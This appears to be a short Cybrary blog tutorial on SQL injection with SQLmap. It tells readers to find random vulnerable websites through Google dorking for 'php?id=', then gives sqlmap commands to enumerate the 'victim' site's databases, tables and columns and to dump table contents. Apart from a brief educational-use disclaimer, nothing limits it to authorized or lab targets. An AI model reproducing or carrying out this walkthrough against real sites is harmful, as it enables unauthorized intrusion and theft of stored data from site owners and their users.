Ready to Start Your Career?

SQL Injection Using SQLmap - [PART 1]

tyga-tyga 's profile image

By: tyga-tyga

June 13, 2016

SQL Injection Using SQLmap - [PART 1] - CybrarySQL, Structured Query Language, is a programming language that allows the user to manage data in a relational database management system (RDBMS) through the use of specially crafted strings. Although great for functionality, it can be disastrous if configured/crafted incorrectly. We can exploit this using the pentesting tool SQLmap.SQLmap is a penetration testing tool that automates the process of exploiting SQL injection flaws and SQL database takeover. More information on SQLmap can be found using Google, or the option -h. Requirements:-Basic understanding of SQL-SQLmap-Common SenseThis is for educational and research purposes only! Do not attempt to violate the law with anything contained here.  Step 1: Identifying the TargetTo find a possibly vulnerable site, we'll Google dork search the term: "php?id=". A dork is an advance search using Google parameters such as "", site:, and filetype:A potentially vulnerable site looks something like this: Step 2: Database EnumerationNow that we found a target, let's identify the databases.
sqlmap -u $url --batch --dbs
where $url is the target url.sqlmap1sqlmap2 We have the database names; let's use this information to get the tables.
sqlmap -u $url --batch --table -D $databasename
Where $url is the Victim URL and $databasename is the name of the database.sqlmap3sqlmap4 With that information, we can discover the columns.
sqlmap -u $url --columns -D $databasename -T $tablename
Where $url is the Victim URL, $databasename is the name of the database, and $tablename is the name of the table.sqlmap5sqlmap6 Step 3: The DumpNow that we've found our target, let's dump what we have.
sqlmap -u $url --dump -D $databasename -T $tablename
And, we'll get something like this:sqlmap7sqlmap8 That's it! I'll be posting again, so stay tuned!Bonus: Here's a list of other popular Google dork queries.
Schedule Demo